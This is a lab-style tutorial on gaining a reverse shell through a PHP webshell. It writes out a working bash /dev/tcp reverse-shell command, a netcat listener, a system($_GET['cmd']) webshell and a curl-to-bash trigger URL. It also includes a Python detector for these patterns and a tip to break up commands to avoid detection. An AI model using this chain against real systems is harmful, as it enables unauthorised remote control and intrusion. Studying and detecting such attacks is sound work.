Exploitation

Reverse Shell

Abstract

Summary
In ethical hacking, one technique involves uploading a script to a server to simulate remote command execution. This is often used in controlled environments for learning or penetration testing.


🛠️ Step-by-Step: Simulating a Reverse Shell in a Lab Environment

Step 1: Create a Shell Script

You can start by creating a basic shell script. This script is used to simulate a reverse connection from a target machine to your listener.

Rather than presenting the command bare, here it is with each part explained in comments:

#!/bin/bash
# Start an interactive bash session and redirect its standard output
# (and, via >&, standard error) to a TCP connection to the listener at
# 10.10.14.204 port 1337, then read standard input from that same connection.
# The comments sit above the command: a comment line following a trailing
# backslash would be joined to the command and break it into separate pieces.
bash -i >& /dev/tcp/10.10.14.204/1337 0>&1

⚠️ Note: This is for educational use only in a safe, isolated lab environment.


Step 2: Set Up a Listener on Your Machine

To receive the connection, you need to open a port on your machine. This is done using netcat:

# Listen on port 1337
nc -nvlp 1337

This command tells your system to wait for incoming connections on port 1337.


Step 3: Upload a Web Script to the Target

In a test environment, you might simulate uploading a script to a web server. Here’s an example of a very basic PHP script that can execute commands:

<?php
// This script executes a command passed via the "cmd" URL parameter
system($_GET["cmd"]);
?>

🧠 Tip: Always test this in a controlled lab. Never deploy such scripts on production systems.


Step 4: Trigger the Script via a Web Request

To execute the uploaded script, you can simulate a browser request like this:

http://<target-ip>/shell.php?cmd=curl%20http://10.10.14.204:8000/shell.sh|bash

This tells the target to download and execute the shell script from your machine.
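The same steps seen from the defender's side, as an added example that is not part of this walkthrough: the Python below scans constructed web-access-log lines for query parameters carrying the download-and-run and /dev/tcp patterns used above, and flags PHP source where a command-execution sink reads raw request input. The log lines, the 203.0.113.x client addresses and the PHP snippet are constructed samples; only 10.10.14.204 comes from the walkthrough.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Shell fragments that a download-and-run or direct reverse-shell request carries.
SUSPICIOUS_CMD = re.compile(
    r"(curl|wget)\b.*\|\s*(ba)?sh\b|/dev/tcp/|\bbash\s+-i\b|\bnc\b.*\s-e\s",
    re.IGNORECASE,
)
# Command-execution sinks fed straight from request input (webshell signature).
PHP_WEBSHELL = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(GET|POST|REQUEST)\b"
)
# Apache/nginx combined-log prefix: client ip ... [time] "METHOD target HTTP/x"
LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_requests(log_lines):
    """Return (client_ip, path, decoded value) for each query parameter whose
    value looks like a shell command of the kind used to stage a reverse shell."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        parts = urlsplit(target)
        for values in parse_qs(parts.query).values():  # parse_qs percent-decodes
            for value in values:
                if SUSPICIOUS_CMD.search(value):
                    hits.append((ip, parts.path, value))
    return hits

def webshell_lines(php_source):
    """Return 1-based line numbers where an exec sink reads raw request input."""
    return [n for n, text in enumerate(php_source.splitlines(), 1)
            if PHP_WEBSHELL.search(text)]

# Constructed sample data (not real traffic); 10.10.14.204 is the lab IP from the walkthrough.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2024:13:55:40 +0000] "GET /search.php?q=bash%20tutorial HTTP/1.1" 200 96 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2024:13:56:02 +0000] "GET /shell.php?cmd=curl%20http://10.10.14.204:8000/shell.sh|bash HTTP/1.1" 200 0 "-" "curl/8.4.0"',
    '203.0.113.9 - - [10/Oct/2024:13:56:30 +0000] "GET /shell.php?cmd=bash%20-i%20%3E%26%20/dev/tcp/10.10.14.204/1337%200%3E%261 HTTP/1.1" 200 0 "-" "curl/8.4.0"',
]
SAMPLE_PHP = '<?php\n$page = $_GET["page"];\nsystem($_GET["cmd"]);\necho "ok";\n?>'

if __name__ == "__main__":
    for ip, path, cmd in suspicious_requests(SAMPLE_LOG):
        print(f"ALERT {ip} {path}: {cmd}")
    print("webshell sinks on lines:", webshell_lines(SAMPLE_PHP))
```

The second sample line contains the word "bash" but no execution pattern, so it is not flagged; the two /shell.php requests are.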


✅ Final Notes

  • Break down commands to avoid detection and improve understanding.
  • Always use these techniques in ethical hacking labs or CTF environments.
  • Never use these methods on unauthorized systems.